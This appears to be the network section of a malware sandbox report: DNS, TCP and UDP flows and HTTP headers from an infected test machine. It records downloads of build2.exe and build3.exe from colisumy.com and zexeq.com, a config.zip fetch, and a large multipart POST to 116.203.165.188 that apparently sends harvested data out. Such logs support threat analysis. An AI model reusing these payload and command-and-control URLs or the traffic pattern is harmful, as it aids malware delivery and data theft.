Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
colisumy.com | 175.119.10.231 | |
api.2ip.ua | 162.0.217.254 | |
t.me | 149.154.167.99 | |
zexeq.com | 201.124.218.111 | |
steamcommunity.com | 69.192.92.139 |
- TCP Requests
-
-
192.168.56.103:49190 116.203.165.188:80
-
192.168.56.103:49178 123.140.161.243:80colisumy.com
-
192.168.56.103:49185 149.154.167.99:443t.me
-
192.168.56.103:49186 149.154.167.99:443t.me
-
192.168.56.103:49187 149.154.167.99:443t.me
-
192.168.56.103:49164 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49165 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49166 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49173 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49174 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49175 162.0.217.254:443api.2ip.ua
-
192.168.56.103:49177 222.236.49.124:80zexeq.com
-
192.168.56.103:49179 222.236.49.124:80zexeq.com
-
192.168.56.103:49189 23.37.146.163:443steamcommunity.com
-
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:53676 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:64894
-
GET
200
https://steamcommunity.com/profiles/76561199263069598
REQUEST
RESPONSE
BODY
GET /profiles/76561199263069598 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: steamcommunity.com
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ *.google-analytics.com https://www.google.com https://www.gstatic.com https://apis.google.com https://recaptcha.net https://www.gstatic.cn/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ *.google-analytics.com https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 18 May 2023 00:43:24 GMT
Content-Length: 34648
Connection: keep-alive
Set-Cookie: sessionid=340f926aec27e7b65e81c459; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None
GET
200
http://zexeq.com/raud/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
REQUEST
RESPONSE
BODY
GET /raud/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com
HTTP/1.1 200 OK
Date: Thu, 18 May 2023 00:43:18 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 568
Connection: close
Content-Type: text/html; charset=UTF-8
GET
200
http://colisumy.com/dl/build2.exe
REQUEST
RESPONSE
BODY
GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: colisumy.com
HTTP/1.1 200 OK
Date: Thu, 18 May 2023 00:43:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
Last-Modified: Tue, 16 May 2023 10:29:24 GMT
ETag: "5ec00-5fbcd0b97d14c"
Accept-Ranges: bytes
Content-Length: 388096
Connection: close
Content-Type: application/octet-stream
GET
200
http://zexeq.com/files/1/build3.exe
REQUEST
RESPONSE
BODY
GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com
HTTP/1.1 200 OK
Date: Thu, 18 May 2023 00:43:19 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
ETag: "2600-5c86757379380"
Accept-Ranges: bytes
Content-Length: 9728
Connection: close
Content-Type: application/x-msdownload
GET
200
http://116.203.165.188/9dfa7ee730fa2f1efb5ed51dbbec22f5
REQUEST
RESPONSE
BODY
GET /9dfa7ee730fa2f1efb5ed51dbbec22f5 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko) (Debian)
Host: 116.203.165.188
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 May 2023 00:43:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://116.203.165.188/config.zip
REQUEST
RESPONSE
BODY
GET /config.zip HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko) (Debian)
Host: 116.203.165.188
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 May 2023 00:43:25 GMT
Content-Type: application/zip
Content-Length: 2685679
Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
Connection: keep-alive
ETag: "631f30d3-28faef"
Accept-Ranges: bytes
POST
200
http://116.203.165.188/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4358810807731758
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko) (Debian)
Host: 116.203.165.188
Content-Length: 118189
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 May 2023 00:43:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49189 23.37.146.163:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com | b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5 |
Snort Alerts
No Snort Alerts